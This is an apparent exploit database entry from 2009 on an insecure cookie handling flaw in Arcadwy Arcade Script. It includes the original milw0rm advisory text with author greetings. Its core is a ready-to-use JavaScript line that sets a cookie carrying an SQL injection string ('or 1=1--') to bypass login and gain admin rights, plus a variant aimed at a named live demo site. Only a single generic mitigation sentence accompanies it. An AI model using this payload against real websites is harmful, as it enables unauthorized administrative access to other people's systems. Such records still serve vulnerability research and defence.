Arcadwy Arcade Script (for ByPass) Insecure Cookie Handling Vulnerability

vendor:

Arcade Script

by:

ZoRLu

7.5

CVSS

HIGH

Insecure Cookie Handling

614

CWE

Product Name: Arcade Script

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Arcadwy Arcade Script (for ByPass) Insecure Cookie Handling Vulnerability

An attacker can exploit this vulnerability by setting a malicious cookie value using the JavaScript code 'javascript:document.cookie = "user=[admin_id],' or ' 1=1--; path=/";'. For the demo, the JavaScript code 'javascript:document.cookie = "user=1,' or ' 1=1--; path=/";' can be used.

Mitigation:

Ensure that cookies are properly validated and sanitized before being used.

Source

Exploit-DB raw data:

[~] Arcadwy Arcade Script (for ByPass) Insecure Cookie Handling Vulnerability 
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 29.03.2009
[~]
[~] Home: yildirimordulari.com / experl.com / z0rlu.blogspot.com / woltaj.org
[~]
[~] contact: trt-turk@hotmail.com
[~] 
[~] N0T: BasImIz Sagolsun, Muhsin YazIcIoglu Ulkemiz ve Ulkumuz icin Buyuk KayÃ½p Allah Rahmet Eylesin :((
[~]
[~] N0T: Herkes Hecker Olmus :S
[~]
[~] N0T: My New Target Buffer Overflow :) There is a little time xD
[~]
[~] -----------------------------------------------------------

Demo:

http://games.arcadwy.com/

Exploit:

javascript:document.cookie = "user=[admin_id],' or ' 1=1--; path=/";

Exploit for demo:

javascript:document.cookie = "user=1,' or ' 1=1--; path=/";

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone
[~]
[~] yildirimordulari.com / experl.com / z0rlu.blogspot.com / woltaj.org
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-03-29]